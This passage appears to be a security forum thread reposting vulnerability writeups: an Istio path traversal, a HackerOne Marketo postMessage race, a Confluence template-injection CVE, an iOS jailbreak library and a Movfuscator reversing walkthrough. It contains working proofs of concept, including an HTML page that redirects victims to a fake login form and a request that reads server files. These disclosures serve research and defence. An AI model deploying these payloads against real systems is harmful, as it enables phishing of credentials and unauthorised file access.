  12. CVE-2019-9901 - Istio/Envoy Path traversal TLDR; I found a path traversal bug in Istio's authorization policy enforcement. Discovery About a year ago, as a part of a customer project, I started looking at Istio, and I really liked what I saw. In fact I liked it so much that I decided to submit a talk for it for JavaZone in 2018. My favorite thing about Istio was, and still is, the mutualTLS authentication and authorization with workload bound certificates with SPIFFE identities. Istio has evolved a lot from the first version 0.5.0, which I initially looked at, to the 1.1 release. The 0.5.0 authorization policies came in the form of deniers, which sounded a lot like blacklists. The later versions have moved to a positive security model (whitelist), where you can specify which workloads (and/or end-users based on JWT) should be allowed to access certain services. Further restrictions can be specified using a set of protocol based authorization rules. I really like the coarse-grained workload authorization, but I'm not too fond of the protocol based rules. We have seen different parsers interpreting the same thing in different ways way too many times. Some perfect examples of this, are in Orange Tsai brilliant research presented in A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!. I mentioned my concerns about this in some later versions of my Istio talk, but never actually tested it... untill now... The bug I set up a simple project with a web server and deployed it on Kubernetes. The web application had two endpoints /public/ and /secret/. I added an authorization policy which tried to grant access to anything below /public/: rules: - services: ["backend.fishy.svc.cluster.local"] methods: ["GET"] paths: ["/public/*"] I then used standard path traversal from curl: curl -vvvv --path-as-is "http://backend.fishy.svc.cluster.local:8081/public/../secret/" And was able to reach /secret/. Timeline The istio team was very friendly and responsive and kept me up to date on the progress. 2019-02-18: I send the intial bug report sent to the istio-security-vulnerabilities mailbox 2019-02-18: Istio Team acknowledges receiving the report 2019-02-20: Istio Team reports the bug has been triaged and work started 2019-02-27: I ask some follow up questions to the mail received on the 20th 2019-02-27: Istio Team replies to questions 2019-03-28: Istio Team updates me about working with the Envoy team to fix this and plan to release this on April 2nd. The envoy issue was created on the 20th of February: https://github.com/envoyproxy/envoy/issues/6008 2019-04-01: Istio Team sends an new update setting April 5th as a new target date 2019-04-05: The security fix is published in Istio version 1.1.2/1.0.7 and Envoy version 1.9.1. The Envoy bug is assigned CVE-2019-9901 Sursa: https://github.com/eoftedal/writings/blob/master/published/CVE-2019-9901-path-traversal.md
  13. Client-Side Race Condition using Marketo, allows sending user to data-protocol in Safari when form without onSuccess is submitted on www.hackerone.com fransrosen submitted a report to HackerOne. Jul 14th (9 months ago) Hi, I made a talk earlier this month about Client-Side Race Conditions for postMessage on AppSecEU: https://speakerdeck.com/fransrosen/owasp-appseceu-2018-attacking-modern-web-technologies In this talk I mention some fun ways to race postMessages from a malicious origin before the legit source sends it. Background As you remember from #207042 you use Marketo for your form-submissions on www.hackerone.com. Now, back then, I abused the fact that no origin was checked on the receiving end of marketo.com. By doing this I was then able to steal the data being submitted. Technical Description In this case however, I noticed that as soon as you submit a form, one of the listener being on www.hackerone.com will pass the content forward to a handler for the specific form that was loaded. As soon as it finds the form that was initiated and submitted, it will either run the error or success-function based on the content of the postMessage. If the message is a success, it will run any form.onSuccess being defined when the form was loaded. You can see some of these in this file: https://www.hackerone.com/sites/default/files/js/js_pdV-E7sfuhFWSyRH44H1WwxQ_J7NeE2bU6XNDJ8w1ak.js form.onSuccess(function() { return false; }); If the onSuccess returns false nothing more will happen. However, if the onSuccess doesn't exist or returns true, the parameter called followUpUrl will instead be sent to location.href. There is no check whatsoever what this URL contains. The code does parse the URL and if a parameter called aliId is set it will append it to the URL. As you might now, the flow of the Marketo-solution looks like this: Form is initiated by loading a JS-file from Marketo. Form shows up on www.hackerone.com Form is submitted. Listener is now initiated on www.hackerone.com Message is sent to Marketo from www.hackerone.com using postMessage Marketo gets the message and runs an ajax call to save it on Marketo When successful, a postMessage is sent from Marketo back to www.hackerone.com with the status. The listener catches the response and checks onSuccess. If onSuccess gives false, don't do anything. If it doesn't exists or returns true, follow the followUpUrl. Exploitation Since no origin check is made on the listener initated in #3, we can from our end try to race the message between #3 and #6. If our message comes through we can direct the user to whatever location we like if we find a form that doesn't utilize onSuccess. Forms on www.hackerone.com Looking at the forms, we can see that one being initiated called mktoForm_1013 does not have any onSuccess-function on it. This means that we can now use the followUpUrl from the postMessage to send the user to our location. We can also see in the URL of your JS-code above that the following URLs contains mktoForm_1013: if (location.pathname == "/product/response") { $('#mktoForm_1013 .mktoHtmlText p').text('Want to get up and running with HackerOne Response? Give us a few details and we’ll be in touch shortly!'); } else if (location.pathname == "/product/bounty") { $('#mktoForm_1013 .mktoHtmlText p').text('Want to tap into the ultimate level of hacker-powered security with HackerOne Bounty? Give us a few details and we’ll be in touch shortly!'); } else if (location.pathname == "/product/challenge") { $('#mktoForm_1013 .mktoHtmlText p').text('Up for a HackerOne Challenge? Want to learn more? Give us a few details and we’ll be in touch shortly!'); } else if (location.pathname == "/services") { $('#mktoForm_1013 .mktoHtmlText p').text("We're looking forward to serving you. Give us a few details and we’ll be in touch shortly!"); } else if (location.pathname == "/") { $('#mktoForm_1013 .mktoHtmlText p').text("Start uncovering critical vulnerabilities today. Give us a few details and we’ll be in touch shortly!"); } And as before in the old report, we know that #contact as the fragment will open the form directly without interaction. CSP Due to your CSP, we cannot send the user to javascript:. If your CSP would have allowed it, we would have a proper XSS on www.hackerone.com. Chrome and Firefox also disallows sending the user to a data:-URL. We can send the user to any location we like, but that's no fun. ...but... ...enter Safari. Safari does not restrict top-navigation to data: (tested in macOS 10.13.5, Safari 11.1.1). This means that we can do the following: Have a malicious page opening https://www.hackerone.com/product/response#contact Make it send a bunch of messages saying the form as successfully submitted. When the victim fills in the form and submits, our message will hopefully win, since Marketo needs to both get the postMessage and send an ajax call to save the response until it sends a legit response. We redirect the user to a very good-looking sign-in page for HackerOne. ??? PROFIT!!! PoC When trying this attack I noticed that if Safari opens www.hackerone.com in a new tab instead of a new window, Safari counts the tab as inactive and will slow down the sending of postMessages to the current frame. However, if you open www.hackerone.com in a complete new window, using window.open(url,'','_blank'), Safari will not count the old window as inactive and the messages will be sent just as fast which will significantly increase our chance of winning the race. The following HTML should show you my PoC in Safari: <html> <head> <script> var b; function doit() { setInterval(function() { b.postMessage('{"mktoResponse":{"for":"mktoFormMessage0","error":false,"data":{"formId":"1013","followUpUrl":"data:text/html;base64,PGhlYWQ+PGxpbmsgcmVsPXN0eWxlc2hlZXQgbWVkaWE9YWxsIGhyZWY9aHR0cHM6Ly9oYWNrZXJvbmUuY29tL2Fzc2V0cy9mcm9udGVuZC4wMjAwMjhlOTU1YTg5Zjg1YTVmYzUyMWVhYzMxMDM2OC5jc3MgLz48bGluayByZWw9c3R5bGVzaGVldCBtZWRpYT1hbGwgaHJlZj1odHRwczovL2hhY2tlcm9uZS5jb20vYXNzZXRzL3ZlbmRvci1iZmRlMjkzYTUwOTEzYTA5NWQ4Y2RlOTcwZWE1YzFlNGEzNTI0M2NjNzY3NWI2Mjg2YTJmM2Y3MDI2ZmY1ZTEwLmNzcz48L2hlYWQ+PGJvZHk+PGRpdiBjbGFzcz0iYWxlcnRzIj4KPC9kaXY+PGRpdiBjbGFzcz0ianMtYXBwbGljYXRpb24tcm9vdCBmdWxsLXNpemUiPjxzcGFuIGRhdGEtcmVhY3Ryb290PSIiPjxkaXYgY2xhc3M9ImZ1bGwtc2l6ZSBhcHBsaWNhdGlvbl9mdWxsX3dpZHRoX2xheW91dCI+PGRpdj48ZGl2PjxkaXYgY2xhc3M9InRvcGJhci1zaWduZWQtb3V0Ij48ZGl2IGNsYXNzPSJpbm5lci1jb250YWluZXIiPjxkaXY+PGEgY2xhc3M9ImFwcF9fbG9nbyIgaHJlZj0iLyI+PGltZyBzcmM9Imh0dHBzOi8vaGFja2Vyb25lLmNvbS9hc3NldHMvc3RhdGljL2ludmVydGVkX2xvZ28tYzA0MzBhZjgucG5nIiBhbHQ9IkhhY2tlck9uZSI+PC9hPjxkaXYgY2xhc3M9InRvcGJhci10b2dnbGUiPjxpIGNsYXNzPSJpY29uLWhhbWJ1cmdlciI+PC9pPjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9InRvcGJhci1zdWJuYXYtd3JhcHBlciI+PHVsIGNsYXNzPSJ0b3BiYXItc3VibmF2Ij48bGkgY2xhc3M9InRvcGJhci1zdWJuYXYtaXRlbSI+PGEgY2xhc3M9InRvcGJhci1zdWJuYXYtbGluayIgaHJlZj0iL3VzZXJzL3NpZ25faW4iPlNpZ24gSW48L2E+Jm5ic3A7fCZuYnNwOzwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItc3VibmF2LWl0ZW0iPjxhIGNsYXNzPSJ0b3BiYXItc3VibmF2LWxpbmsiIGhyZWY9Ii91c2Vycy9zaWduX3VwIj5TaWduIFVwPC9hPjwvbGk+PC91bD48L2Rpdj48ZGl2IGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi13cmFwcGVyIj48dWwgY2xhc3M9InRvcGJhci1uYXZpZ2F0aW9uIj48bGkgY2xhc3M9InRvcGJhci1uYXZpZ2F0aW9uLWl0ZW0iPjxzcGFuIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1kZXNrdG9wLWxpbmsiPjxhIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1saW5rIj5Gb3IgQnVzaW5lc3M8L2E+PC9zcGFuPjwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1pdGVtIj48c3BhbiBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tZGVza3RvcC1saW5rIj48YSBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tbGluayI+Rm9yIEhhY2tlcnM8L2E+PC9zcGFuPjwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1pdGVtIj48c3BhbiBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tZGVza3RvcC1saW5rIj48YSBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tbGluayIgaHJlZj0iL2hhY2t0aXZpdHkiPkhhY2t0aXZpdHk8L2E+PC9zcGFuPjwvbGk+PGxpIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1pdGVtIj48c3BhbiBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tZGVza3RvcC1saW5rIj48YSBjbGFzcz0idG9wYmFyLW5hdmlnYXRpb24tbGluayI+Q29tcGFueTwvYT48L3NwYW4+PC9saT48bGkgY2xhc3M9InRvcGJhci1uYXZpZ2F0aW9uLWl0ZW0iPjxzcGFuIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1kZXNrdG9wLWxpbmsiPjxhIGNsYXNzPSJ0b3BiYXItbmF2aWdhdGlvbi1saW5rIiBocmVmPSIvdXNlcnMvc2lnbl9pbiI+VHJ5IEhhY2tlck9uZTwvYT48L3NwYW4+PC9saT48L3VsPjwvZGl2PjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9InRvcGJhci1zdWIiPjwvZGl2PjwvZGl2PjxzcGFuPjwvc3Bhbj48L2Rpdj48ZGl2IGNsYXNzPSJmdWxsLXdpZHRoLWNvbnRhaW5lciIgc3R5bGU9InBhZGRpbmctdG9wOiAxNTBweDsiPjxkaXYgY2xhc3M9Im5hcnJvdy13cmFwcGVyIj48ZGl2Pjxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSJodHRwczovL2hhY2tlcm9uZS5jb20vdXNlcnMvc2lnbl9pbiIgb25zdWJtaXQ9ImFsZXJ0KCdpIGdvdCBpdDogJyArIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzaWduX2luX2VtYWlsJykudmFsdWUgKyAnOicgKyBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnaW5wdXQtNCcpLnZhbHVlKTsgcmV0dXJuIGZhbHNlOyIgbm92YWxpZGF0ZT0iIiBjbGFzcz0ic3BlYy1zaWduLWluLWZvcm0iPjxkaXY+PGgxIGNsYXNzPSJzZWN0aW9uLXRpdGxlIHRleHQtYWxpZ25lZC1jZW50ZXIiPlNpZ24gaW4gdG8gSGFja2VyT25lPC9oMT48ZGl2IGNsYXNzPSJuYXJyb3ctY29udGFpbmVyIj48ZGl2IGNsYXNzPSJpbnB1dC13cmFwcGVyIj48bGFiZWwgY2xhc3M9ImlucHV0LWxhYmVsIiBmb3I9InNpZ25faW5fZW1haWwiPkVtYWlsIGFkZHJlc3M8L2xhYmVsPjxpbnB1dCB0eXBlPSJlbWFpbCIgY2xhc3M9ImlucHV0IHNwZWMtc2lnbi1pbi1lbWFpbCIgbmFtZT0idXNlcltlbWFpbF0iIHZhbHVlPSIiIGlkPSJzaWduX2luX2VtYWlsIiBhdXRvY29tcGxldGU9Im9uIj48ZGl2IGNsYXNzPSJoZWxwZXItdGV4dCI+VXNpbmcgU0FNTD8gRW1haWwgYWRkcmVzcyBvbmx5LCBubyBwYXNzd29yZCBuZWVkZWQuPC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0iaW5wdXQtd3JhcHBlciI+PGxhYmVsIGNsYXNzPSJpbnB1dC1sYWJlbCIgZm9yPSJpbnB1dC00Ij5QYXNzd29yZDwvbGFiZWw+PGlucHV0IHR5cGU9InBhc3N3b3JkIiBjbGFzcz0iaW5wdXQgc3BlYy1zaWduLWluLXBhc3N3b3JkIiBuYW1lPSJ1c2VyW3Bhc3N3b3JkXSIgdmFsdWU9IiIgaWQ9ImlucHV0LTQiIGF1dG9jb21wbGV0ZT0ib24iIG1heGxlbmd0aD0iNzIiPjwvZGl2PjxkaXYgY2xhc3M9ImlucHV0LXdyYXBwZXItc21hbGwiPjxkaXYgY2xhc3M9InJlbWVtYmVyLW1lIj48aW5wdXQgdHlwZT0iY2hlY2tib3giIGlkPSJ1c2VyX3JlbWVtYmVyX21lIiBuYW1lPSJ1c2VyW3JlbWVtYmVyX21lXSIgY2xhc3M9InNwZWMtc2lnbi1pbi1yZW1lbWJlci1tZSIgdmFsdWU9IjEiPjxsYWJlbCBmb3I9InVzZXJfcmVtZW1iZXJfbWUiPlJlbWVtYmVyIG1lIGZvciB0d28gd2Vla3M8L2xhYmVsPjwvZGl2PjxhIGhyZWY9Ii91c2Vycy9wYXNzd29yZC9uZXciIGNsYXNzPSJmb3Jnb3QtcGFzc3dvcmQiPkZvcmdvdCB5b3VyIHBhc3N3b3JkPzwvYT48ZGl2IGNsYXNzPSJjbGVhcmZpeCI+PC9kaXY+PC9kaXY+PGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ1dHRvbiBidXR0b24tLXN1Y2Nlc3MgaXMtZnVsbC13aWR0aCBzcGVjLXNpZ24taW4tc3VibWl0IiBuYW1lPSJjb21taXQiIHZhbHVlPSJTaWduIGluIj48L2Rpdj48ZGl2IGNsYXNzPSJuYXJyb3ctZm9vdGVyIj5ObyBhY2NvdW50IHlldD8gPGEgaHJlZj0iL3VzZXJzL3NpZ25fdXAiPkNyZWF0ZSBhbiBhY2NvdW50LjwvYT48L2Rpdj48ZGl2IGNsYXNzPSJjbGVhcmZpeCI+PC9kaXY+PC9kaXY+PC9mb3JtPjwvZGl2PjwvZGl2PjwvZGl2PjwvZGl2Pjwvc3Bhbj48L2Rpdj48bm9zY3JpcHQ+PGRpdiBjbGFzcz0ianMtZGlzYWJsZWQiPkl0IGxvb2tzIGxpa2UgeW91ciBKYXZhU2NyaXB0IGlzIGRpc2FibGVkLiBUbyB1c2UgSGFja2VyT25lLCBlbmFibGUgSmF2YVNjcmlwdCBpbiB5b3VyIGJyb3dzZXIgYW5kIHJlZnJlc2ggdGhpcyBwYWdlLjwvZGl2Pjwvbm9zY3JpcHQ+PC9ib2R5Pg==","aliId":null}}}','*'); console.log('send...') }, 10); } </script> </head> <body> <a href="#" onclick="b=window.open('https://www.hackerone.com/product/response#contact','b','_blank'); doit(); return false;" target="_blank">Click me and send something</a></body> </html> It's large, but it also contains your login page. 1. User clicks on the malicious page: 2. User fills in the contact form and submits 3. User gets directly redirected to our data-page 4. If they sign in we will steal the creds: PoC-movie Here's a movie showing the scenario: Impact I'm pretty divided on the impact of this. You could argue that this is similar to opening www.hackerone.com from a page, that will on a later time redirect the user to data:, which is fully possible and probably just as sneaky. The only difference would be that this could be properly fixed and the logic of the listener in this case actually enables the attacker to fool the user related to the interaction with the site. Also, most likely a lot of other customers of Marketo are affected by this and if they lack CSP, there will be XSS:es all over the place. Also, if IE11 would support those contact-popups, it would be an XSS due to the lack of CSP-support, however now I'm getting a JS-error trying to open the contact-form... Mitigation What's interesting here though is that you can actually mitigate this easily by making sure you always use onSuccess=function(){return false} to always make sure followUpUrl won't be used. Regards, Frans 5 attachments: F320358: malicious.png F320359: contact.png F320360: sign-in.png F320361: popup.png F320362: safari-location-data.mp4 Sursa: https://hackerone.com/reports/381356
      • 1
      • Upvote
  14. 【CVE-2019-3396】:SSTI and RCE in Confluence Server via Widget Connector 发表于 2019-04-06 | 分类于 Web Security | 阅读次数 1141 Twitter: chybeta Security Advisory https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html Analysis According to the document , there are three parameters that you can set to control the content or format of the macro output, including URL、Width and Height. the Widget Connector has defind some renders. for example the FriendFeedRenderer: public class FriendFeedRenderer implements WidgetRenderer { ... public String getEmbeddedHtml(String url, Map<String, String> params) { params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm"); return this.velocityRenderService.render(getEmbedUrl(url), params); } } In FriendFeedRenderer‘s getEmbeddedHtml function , you will see they put another option _template into params map. However, some other renderers, such as in video category , just call render(getEmbedUrl(url), params) directly So in this situation, we can "offer" the _template ourseleves which the backend will use the params to render Reproduce POST /rest/tinymce/1/macro/preview HTTP/1.1 {"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}} Patch in fix version, it will call doSanitizeParameters before render html which will remove the _template in parameters. The code may like this: public class WidgetMacro extends BaseMacro implements Macro, EditorImagePlaceholder { public WidgetMacro(RenderManager renderManager, LocaleManager localeManager, I18NBeanFactory i18NBeanFactory) { ... this.sanitizeFields = Collections.unmodifiableList(Arrays.asList(new String[] { "_template" })); } ... public String execute(Map<String, String> parameters, String body, ConversionContext conversionContext) { ... doSanitizeParameters(parameters); return this.renderManager.getEmbeddedHtml(url, parameters); } private void doSanitizeParameters(Map<String, String> parameters) { Objects.requireNonNull(parameters); for (String sanitizedParameter : this.sanitizeFields) { parameters.remove(sanitizedParameter); } } } 点击赞赏二维码,您的支持将鼓励我继续创作! Sursa: https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/
  15. jelbrekLib Give me tfp0, I give you jelbrek Library with commonly used patches in open-source jailbreaks. Call this a (light?) QiLin open-source alternative. Compiling: ./make.sh Setup Compile OR head over to https://github.com/jakeajames/jelbrekLib/tree/master/downloads and get everything there. Link with jelbrekLib.a & IOKit.tbd and include jelbrekLib.h Call init_jelbrek() with tfp0 as your first thing and term_jelbrek() as your last Issues AMFID patch won't resist after app enters background. Fix would be using a daemon (like amfidebilitate) or injecting a dylib (iOS 11) iOS 12 satus rootFS remount is broken. There is hardening on snapshot_rename() which can and has been (privately) bypassed, but it for sure isn't as bad as last year with iOS 11.3.1, where they made major changes. The only thing we need is figuring out how they check if the snapshot is the rootfs and not something in /var for example where snapshot_rename works fine. kexecute() is also probably broken on A12. Use bazad's PAC bypass which offers the same thing, so this isn't an issue (fr now) getting root, unsandboxing, NVRAM lock/unlock, setHSP4(), trustbin(), entitlePid + task_for_pid() are all working fine. The rest that is not on top of my mind should also work fine. Codesign bypass Patching amfid should be a matter of getting task_for_pid() working. (Note: on A12 you need to take a completely different approach, bazad has proposed an amfid-patch-less-amfid-bypass in here https://github.com/bazad/blanket/tree/master/amfidupe, which will probably work but don't take my word for it). As for the payload dylib, you can just sign it with a legit cert and nobody will complain about the signature. As for unsigned binaries, you'll probably have to sign them with a legit cert as well, due to CoreTrust, or just add to trustcache. Credits theninjaprawn & xerub for patchfinding xerub & Electra team for trustcache injection stek29 for nvramunlock & lock and hsp4 patch theninjaprawn & Ian Beer for dylib injection Luca Todesco for the remount patch technique Umang Raghuvanshi for the original remount idea pwn20wnd for the implementation of the rename-APFS-snapshot technique AMFID dylib-less patch technique by Ian Beer reworked with the patch code from Electra's amfid_payload (stek29 & coolstar) rootless-hsp4 idea by Ian Beer. Implemented on his updated async_wake exploit Sandbox exceptions by stek29 (https://stek29.rocks/2018/01/26/sandbox.html) CSBlob patching with stuff from Jonathan Levin and xerub Symbol finding by me (https://github.com/jakeajames/kernelSymbolFinder) The rest of patches are fairly simple and shouldn't be considered property of anyone in my opinion. Everyone who has enough knowledge can write them fairly easily And, don't forget to tell me if I forgot to credit anyone! Sursa: https://github.com/jakeajames/jelbrekLib
  16. Understanding the Movfuscator 14 MAR 2019 • 12 mins read MoVfuscator is the PoC for the Turing Completeness of Mov instruction. Yes, you guessed it right. It uses only mov’s, except for a few places. This makes reversing difficult, because the control flow is obfuscated. I’ll be analyzing the challenge Mov of UTCTF’19 using IDA Free. MoV The Stack Movfuscator uses its own stack. The stack consists of an array of addresses. The stack looks like this Each element of the stack is at an offset of 0x200064 from it’s stack address. The stack begins at 0x83f70e8 and it grows from high to low address. The stack pointer is saved in the variable sesp. The variable NEW_STACK stores the address of guard. mov esp, NEW_STACK ; address of guard mov esp, [esp-0x200068] ; address of A[n-1] mov esp, [esp-0x200068] ; address of A[n-2] ; ... ; n times ; ... ; use esp So, mov esp, [esp-0x200068], subtracts 4 from esp. Now we can understand what start does. mov dword [esp-4*4], SIGSEGV mov dword [esp-4*4+4], offset sa_dispatch mov dword [esp-4*4+8], 0 call sigaction mov dword [esp-3*4], SIGILL mov dword [esp-3*4+4], offset sa_loop mov dword [esp-3*4+8], 0 call sigaction ; ; ... ; .plt:08048210 public dispatch .plt:08048210 dispatch proc near ; DATA XREF: .data:sa_dispatch↓o .plt:08048210 mov esp, NEW_STACK .plt:08048216 jmp function .plt:08048216 dispatch endp Movfuscator uses SIGSEGV to execute a function, and SIGILL to execute a JMP instruction which jumps to master_loop. Because we can’t mov to eip, which is invalid in x86. Execution is controlled using the on variable. This is a boolean variable that determines whether a statement will be executed or not. The master_loop sets the value of on and then disables toggle_execution. This is the structure of if statement. def logic_if(condition, dest, src) if (condition) dest = src else discard = src It then adds sesp with 4 and stores the sum in stack_temp. Push The array sel_data contains two members - discard and data_p. This is a MUX which selects data_p if on is set. So, if on is set, eax contains the address of NEW_STACK. And the value of esp-4 is stored in NEW_STACK, which is the stack pointer. And then the value of stack_temp is stored in the current stack pointer. The above set of instructions are equivalent to mov eax, [stack_temp] sub esp, 4 mov [esp], eax It can also be represented as push dword [stack_temp] The sequnce of instructions until 0x0804843C do the following mov eax, [sesp] add eax, 4 push eax push dword [sesp] push 0x880484fe It conditionally sets the value of target to branch_temp. The target variable is the destination an unconditional jump. In this code, the target is set to 0x88048744. Let’s see how jump’s are implemented. on = 1 ... target = jump_destination ; save registers R, F, D on = 0 ... if (fetch_addr == target) { ; restore registers R, F, D on = 1 } ... The above code saves the registers. It now checks if the fetch address equals the address contained in target. The equal-to comparison is computed for each byte and the result is the logical-and of the four comparisons. The result of the comparison is stored in the boolean variable b0. Now if b0 is set, the registers are restored and the on variable is set. This is equivalent to the following if the on variable is set. push 0 call _exit You must be wondering how I deduced the call instruction. Here is it Function Call Function calls are implemented using the SIGSEGV signal. The array fault is defined like this .data:085F7198 fault dd offset no_fault ; DATA XREF: _start+51F↑r .data:085F719C dd 0 .data:085F71A0 no_fault dd 0 So, fault when indexed with on returns 0 if on is set, otherwise a valid address. This return value is dereferenced which results in a SIGSEGV (Segmentation Fault) if its zero. But since, the value of target is 0x88048744. The control jumps to main. In main, the registers are restored and the on flag is set. After that it pushes fp, R1, R2, R3, F1, dword_804e04c, D1 into the stack The function prologue It first assigns the frame pointer fp to the current stack pointer and allocates 37 dwords (148 bytes) from the stack. This is equivalent to the following x86 mov ebp, esp ; ebp is **fp** sub esp, 148 Computes fp-19*4 and stores the value of R3 into the address. So, this is basically mov R3, 0 mov [fp-19*4], R3 Great ! So, we have a dword at fp-0x4c initialized to 0. Then we have an array of bytes at fp-0x47 initialized as follows mov R0, 0x1a mov byte [fp-18*4], R0 mov R0, 0x19 mov byte [fp-0x47], R0 mov R0, 11 mov byte [fp-0x46], R0 mov R0, 0x31 mov byte [fp-0x45], R0 mov R0, 6 mov byte [fp-17*4], R0 mov R0, 4 mov byte [fp-0x43], R0 mov R0, 0x18 mov byte [fp-0x42], R0 mov R0, 0x10 mov byte [fp-0x41], R0 mov R0, 10 mov byte [fp-16*4], R0 mov R0, 0x33 mov byte [fp-0x3f], R0 mov R0, 0x19 mov byte [fp-0x3e], R0 mov R0, 10 mov byte [fp-0x3d], R0 mov R0, 0x33 mov byte [fp-15*4], R0 mov R0, 0 mov byte [fp-0x3b], R0 mov R0, 10 mov byte [fp-0x3a], R0 mov R0, 0x3c mov byte [fp-0x39], R0 mov R0, 0x19 mov byte [fp-14*4], R0 mov R0, 13 mov byte [fp-0x37], R0 mov R0, 6 mov byte [fp-0x36], R0 mov R0, 0x19 mov byte [fp-0x35], R0 mov R0, 0x3c mov byte [fp-13*4], R0 mov R0, 14 mov byte [fp-0x33], R0 mov R0, 0x10 mov byte [fp-0x32], R0 mov R0, 0x3c mov byte [fp-0x31], R0 mov R0, 0x10 mov byte [fp-12*4], R0 mov R0, 12 mov byte [fp-0x2f], R0 mov R0, 0x32 mov byte [fp-0x2e], R0 mov R0, 10 mov byte [fp-0x2d], R0 mov R0, 0x14 mov byte [fp-11*4], R0 mov R0, 13 mov byte [fp-0x2b], R0 mov R0, 6 mov byte [fp-0x2a], R0 mov R0, 0x19 mov byte [fp-0x29], R0 mov R0, 0x3c mov byte [fp-10*4], R0 mov R0, 0x19 mov byte [fp-0x27], R0 mov R0, 6 mov byte [fp-0x26], R0 mov R0, 0x33 mov byte [fp-0x25], R0 mov R0, 4 mov byte [fp-9*4], R0 mov R0, 10 mov byte [fp-0x23], R0 mov R0, 0x33 mov byte [fp-0x22], R0 mov R0, 0x19 mov byte [fp-0x21], R0 mov R0, 14 mov byte [fp-8*4], R0 mov R0, 6 mov byte [fp-0x1f], R0 mov R0, 0x31 mov byte [fp-0x1e], R0 mov R0, 0x31 mov byte [fp-0x1d], R0 mov R0, 0x1e mov byte [fp-7*4], R0 mov R0, 0x3c mov byte [fp-0x1b], R0 mov R0, 0x17 mov byte [fp-0x1a], R0 mov R0, 10 mov byte [fp-0x19], R0 mov R0, 0x31 mov byte [fp-6*4], R0 mov R0, 6 mov byte [fp-0x17], R0 mov R0, 0x19 mov byte [fp-0x16], R0 mov R0, 10 mov byte [fp-0x15], R0 mov R0, 9 mov byte [fp-5*4], R0 mov R0, 0x3c mov byte [fp-0x13], R0 mov R0, 0x19 mov byte [fp-0x12], R0 mov R0, 12 mov byte [fp-0x11], R0 mov R0, 0x3c mov byte [fp-4*4], R0 mov R0, 0x19 mov byte [fp-0xf], R0 mov R0, 13 mov byte [fp-0xe], R0 mov R0, 10 mov byte [fp-0xd], R0 mov R0, 0x3c mov byte [fp-3*4], R0 mov R0, 0 mov byte [fp-0xb], R0 mov R0, 13 mov byte [fp-0xa], R0 mov R0, 6 mov byte [fp-0x9], R0 mov R0, 0x31 mov byte [fp-2*4], R0 mov R0, 0x31 mov byte [fp-7], R0 mov R0, 10 mov byte [fp-6], R0 mov R0, 0x33 mov byte [fp-5], R0 mov R0, 4 mov byte [fp-4], R0 mov R0, 10 mov byte [fp-3], R0 mov R0, 2 mov byte [fp-2], R0 At 0x804ba9c, the int variable at fp-0x4c is set to 0. If target is 0x8804bb37, it executes the following if (target == 0x8804bb37) { ; restore the registers R{0,1,2,3} = jmp_r{0,1,2,3} F{0,1} = jmp_f{0,1} D{0,1} = jmp_d{0, 1} dword_804e044 = dword_85f717c dword_804e04c = dword_85f7184 ; set execution flag on = 1 } mov R3, [fp-19*4] if (on) { mov R3, [R3] mov R2, [fp-37*4] add R2, R3 mov R1, [fp-18*4] add R3, R1 mov R0, byte [R3] mov R3, R0 xor R3, 0x53 sub R3, 3 xor R3, 0x33 mov R0, R3 mov [R2], R0 } Since, the target contains 0x88048744 which is not 0x8804bb37, none of the instructions in the if enclosed by on is executed. At 0x0804C2D4, we have another branch check if (target == 0x8804C2D4) { RESTORE_REGS() on = 1 } mov R3, [fp-19*4] if (on) { add R3, 1 mov [fp-19*4], R3 mov R3, [fp-19*4] setc sbb R3, 0x47 mov branch_temp, 0x8804bb37 } alu_false contains 1 at index 0, and 0 at the remaining indices. So, this sets the complement of the Carry flag. ZeroFlag is evaluated as a NOR logic, i.e., ZF = !(alu_s[0] | alu_s[1] | alu_s[2] | alu_s[3]) alu_b7 is an array of 256 dwords, the first 128 are zero, and the rest are 1. Indexing into this array determines the Sign bit (bit 7) of the index. Okay, so alu_cmp_of represents a truth table. Of what ? Well, there are only two out of the eight minterms set. So, we get the following SOP x'ys + xy's' Where x, y, s are the sign bits of alu_x, alu_y, alu_z. Cool ! This is the overflow flag It xor’s SignFlag and OverflowFlag and sets target to branch_temp which is 0x8804bb37. By x0ring the sign and overflow flags we get the LessThan flag. So, if R3 is less than 0x47, the target is set to 0x8804bb37. Then we have the following mov byte [fp-0x4d], 0 if (target == 0x8804CA3B) { on = 1 } if (on) { mov esp, fp mov D1, [esp] mov dword_804e04c, [esp+4] sub esp, 4*2 mov eax, [esp] sub esp, 4 mov F1, eax mov eax, [esp] sub esp, 4 mov R3, eax mov eax, [esp] sub esp, 4 mov R2, eax mov eax, [esp] sub esp, 4 mov R1, eax mov eax, [esp] sub esp, 4 mov fp, eax mov eax, [esp] sub esp, 4 mov branch_temp, eax mov target, branch_temp on = 0 } A SIGILL is executed which causes the control to jump to master loop. And the execution of the instructions are skipped until the address the control reaches at 0x804bb37 So, this is basically a while loop. Wow !! The control first compares R3 